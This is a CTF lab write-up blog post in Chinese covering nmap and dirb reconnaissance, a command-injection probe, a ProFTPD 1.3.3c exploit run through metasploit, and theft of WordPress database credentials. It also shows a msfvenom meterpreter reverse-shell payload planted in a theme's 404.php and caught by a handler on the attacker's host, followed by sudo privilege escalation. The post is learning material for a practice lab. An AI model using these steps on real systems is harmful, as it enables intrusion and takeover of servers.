我的CTF学习与教学之旅笔记4

最新推荐文章于 2024-03-30 20:49:17 发布
最新推荐文章于 2024-03-30 20:49:17 发布
阅读量798 收藏 2
点赞数
分类专栏: web安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lm19770429/article/details/105295039
版权
本文分享了在靶场环境中进行夺旗挑战的经验,包括利用nmap、dirb、nikto等工具进行端口扫描与信息探测,通过ssh、ftp等服务登录靶机,以及利用WordPress配置文件获取数据库凭证的方法。还介绍了如何利用ProFTPD漏洞进行渗透,并通过创建反射渗透php代码控制靶机。
摘要由CSDN通过智能技术生成

靶场夺旗及FTP漏洞

经验:

nmap -p- T4 IP 可以扫描到未知端口

nmap -A -vT IP 快速扫描

对靶场的敏感信息探测:

dirb http://IP:port

nikto -host http://IP:port

一定要仔细看有没有robots.txt。太重要了,第一次就漏掉了!

 

  • 对于大端口的探测:

nc IP port

本例当中的大端口有:22222 13337 60000

ssh -p 22222 username@IP进行登录

dirb 

nikto

  • 对于一些查找的页面,一定要看源代码
  • 对于ftp 、smb、http一定要浏览一下
  • 利用互动文本框,尝试输入命令,如:127.0.0.1;id
  • 如果有些应用屏蔽某些命令,可以考虑找相关命令替换:如cat more less
  • 考虑用ssh登录远程主机,前提猜到用户名和密码

          有时ssh不能直接连到22端口,此时看是否有其他开放的ssh端口

          可以:ssh -p 22222 username@IP进行登录

对FTP服务器:

nmap -A -T4 -v -p- -oX 139.xml 10.10.10.139

host          port  proto  name  state  info
----          ----  -----  ----  -----  ----
10.10.10.139  21    tcp    ftp   open   ProFTPD 1.3.3c
10.10.10.139  22    tcp    ssh   open   OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 Ubuntu Linux; protocol 2.0
10.10.10.139  80    tcp    http  open   Apache httpd 2.4.18 (Ubuntu)

 

用searchsploit命令

看一下txt文件内容

cat /usr/share/exploitdb/exploits/linux/remote/15662.txt

参考txt文件信息,修改相关信息,如远程IP地址,实现入侵。过程比较复杂。

我们利用metasploit中的对应功能进行渗透。

在msfconsole中直接利用ProFTPD 1.3.3c漏洞,search一下找到相关exploit

直接拿下,权限是root。

python -c "import pty;pty.spawn('/bin/bash')"   #出现命令提示符,看着比较舒服

另外一套思路:前提是登入靶机,不论以什么用户

dirb http:/10.10.10.139

nikto -host 10.10.10.139

发现有wordpress:地址为:http://vtcsec/secret/wp-login.php

思路:在网站配置文件中,找用户密码、进入,如下:

cat /var/www/html/secret/wp-config.php

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp_myblog');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'arootmysqlpass');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
 

mysql -uroot -p -h localhost 进入数据库,找wordpress应用的合法用户名和密码。

use wp_myblog;

select * from wp_users;

靠,密码是数字摘要生成的。考虑彩虹表。

但是,这是我想起了弱口令,admin 123456 000000 

生成反射渗透php代码:msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.130(msf主机IP地址)

在wordpress中,替换404.php。

在msf中:

use exploit/multi/handler(设定使用的大炮)

set payload php/meterpreter/reverse_tcp(设定使用的炮弹)

set lhost 10.10.10.130(设置监听地址)

exploit

浏览:http://10.10.10.131/secret/wp-content/themes/twentyseventeen/404.php

反射成功。

cat  /etc/passwd

有一个普通用户:猜测弱口令:marlinspike,与用户一样。

marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash

sudo -l  列出marlinspike的提权的权限

sudo su - 提升为root权限

 

本例中需要对地址进行解析

在/etc/hosts中加入IP地址映射关系

10.10.10.139    vtcsec

 

 

 

花纵酒
关注
专栏目录
学习笔记3——Shell基础(一 ~ 三)
qq_41913134的博客
09-17 262
Shell基础 一、Shell概述 1、 Shell是什么 Shell是一个命令行解释器,它为用户提供了一个向Linux内核发送请求以便运行程序的界面系统级程序,用户可以用Shell来启动、挂起、停止甚至是编写一些程序。 Shell还是一个功能相当强大的编程语言,易编写,易调试,灵活性较强。Shell是解释执行的脚本语言,在Shell中可以直接调用Linux系统命令。 2、 Shell的分类 ● Bourne Shell:从1979起Unix就开始使用Bourne Shell,Bourne Shell的主
ctf.show与学习笔记
Q221022的博客
01-29 3185
ctf.show 1.密码学签到 看到密文之后不难发现,flag就是倒着写的,直接将密文倒叙输出就是答案 2. 看到题目,全是由符号组成的,将题目内容全部复制到控制台,回车即可得到答案 3. 第三题与第二题看起来是一样的,所以先将其复制到控制台,发现报错了,有中文的引号,将所有的引号全部换成英文之后还是没有得到flag,········(不会了,没有思路了) 4. 直接用工具计算出私钥d即可 5. 根据rsa密码的解密规则解出m 6. 没有判断出...
内网渗透之信息收集--nmap软件、nc(Netcat)工具、socat命令行应用程序使用
xiaotia_123的博客
03-19 1952
信息收集是指通过各种方式获取所 需要的信息
Tomcat配置项目直接通过http://ip:port访问
假女吖的博客
01-20 1023
Tomcat配置项目直接通过http://ip:port访问,解决项目重复加载两次的问题
nc命令
qq_42946963的博客
11-27 7455
什么是nc nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 (2)端口的扫描,nc可以作为client发起TCP或UDP连接 (3)机器之间传输文件 (4)机器之间网络测速 想要连接到某处: nc [-options] hostname port[s] [ports] … 绑定端口等待连接: nc -l -p port [-option
linux:使用nc(netcat)命令进行端口检测,并使用Docker管理容器
weixin_44462773的博客
11-10 1848
通过创建linux可执行shell脚本文件,再设置crontab调度执行实现循环检测IP:端口是否能正常连接,能连接则关闭docker服务,不能连接则开启docker服务退出。
nc命令用法举例
GNNUXXL的专栏
01-04 1万+
什么是nc nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 (2)端口的扫描,nc可以作为client发起TCP或UDP连接 (3)机器之间传输文件 (4)机器之间网络测速 ...
nc工具学习
weixin_38169769的博客
08-05 117
0x00、命令详解 基本使用 想要连接到某处:nc [-options] ip port 绑定端口等待连接:nc -l -p port ip 参数: -e prog 程序重定向,一旦连接,就执行 [危险!!]-g gateway source-routing hop point[s], up to 8-G num source-routing pointer: 4, 8, 1...
CTF Web学习笔记
01-11
### CTF Web学习笔记知识点详解 #### 杂项部分 **1. 隐写术** 隐写术是一种将信息隐藏于其他非秘密数据之中的技术,这种技术通常用于隐蔽通信或数据保护。在CTF竞赛中,经常出现的情况是将flag隐藏在图像、音频...
基于Python的CTF学习材料设计源码仓库
最新发布
10-05
该项目是一个专注于CTF(Capture The Flag)学习材料的Python源码仓库,包含28个文件,其中22个为Python源代码文件,3个Markdown文档,1个PDF文件,1个Python编译文件和1个压缩文件。该仓库集合了丰富的CTF学习资源...
CTF笔记.one
05-06
CTF笔记,注意是.one格式,里面详细记录了很多笔记,希望对各位学习有帮助!
CTF从入门到提升教学视频
01-28
CTF能够锻炼选手对一些漏洞的理解能力,对安全研究、渗透测试也有一定的作用。越来越多的企业招聘安全从业人员时都会对CTF有一定的要求。
【Pwn | CTF】BUUCTF test_your_nc1
weixin_46301214的博客
01-31 995
nc命令是一个用于网络通信的命令行工具,全称为netcat。以上是nc命令的一些常用用法和参数,需要注意的是,nc命令在不同的操作系统上可能会有一些差异。还记得我以前第一次做pwn题目的时候,是真的懵逼,连接上之后没反应。这题直接连接就可以了,windows装了nc工具,直接耍。这里光标去了下一行,是已经连接上,在等你输入命令呢。下面给一点nc命令的解释,文心一言得出来的。天命:时隔两年,又杀回了pwn这里。然后正常查看 flag 文件就行了。拿到题目的提示,测试你的nc工具。
2023春秋杯冬季赛wp
Scorpio_m7
03-30 866
一天,当你正在监控公司的网络状况时,你突然发现了一些异常的现象,部分服务器无法访问,部分数据无法读取,同时你的安全设备产生了告警,截获了一段经过加密的流量。md中有一半的flag,图片给了加密的算法,并且看到CRC是相同的,就可以用明文攻击,使用archpr.exe,选择plain-text模式,encrypted zip file选择外卖箱,plain-text file path 选择key.zip,开始攻击后得到压缩包,解压后得到txt.galf。然后构造利用链,启动vps的http,启动监听。
第三章 隐藏通信隧道技术
weixin_44286136的博客
10-31 2561
在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。
linux 测试本地端口是否打开,关于bash:有效测试Linux是否打开了端口?
weixin_34438539的博客
04-30 413
从bash脚本中,如何快速确定端口445是否在服务器上处于打开/侦听状态。我已经尝试了几种选择,但是我想要一些快速的方法:1. lsof -i :445(以秒为单位)2. netstat -an |grep 445 |grep LISTEN(以秒为单位)3. telnet(它不返回)4. nmap,netcat在服务器上不可用很高兴知道一种不会先枚举然后在此之后摸索的方式。netcat是否可用? ...
NC工具的使用说明教程
热门推荐
xysoul的专栏
08-21 8万+
nc的使用方法 netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。  在中国,它
渗透测试--CTF--FLAG
qq_50034496的博客
12-06 5617
渗透测试--CTF--FLAG
常用的一些安全相关网站汇总
lm19770429的专栏
04-15 2088
关于渗透测试: OWASP项目地址:https://owasp.org/projects/ owasp测试指南:https://owasp.org/www-project-web-security-testing-guide/ owasp开发指南:
应急响应与WEB安全CTF学习大纲
"CTF-web学习大纲,应急响应之WEB,VSRC应急响应中心,基础概念,注意事项,事件了解,WEB攻击溯源" CTF(Capture The Flag)是一种网络安全竞赛,通常涉及攻防演练,其中“WEB”部分主要关注Web应用程序的安全性。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值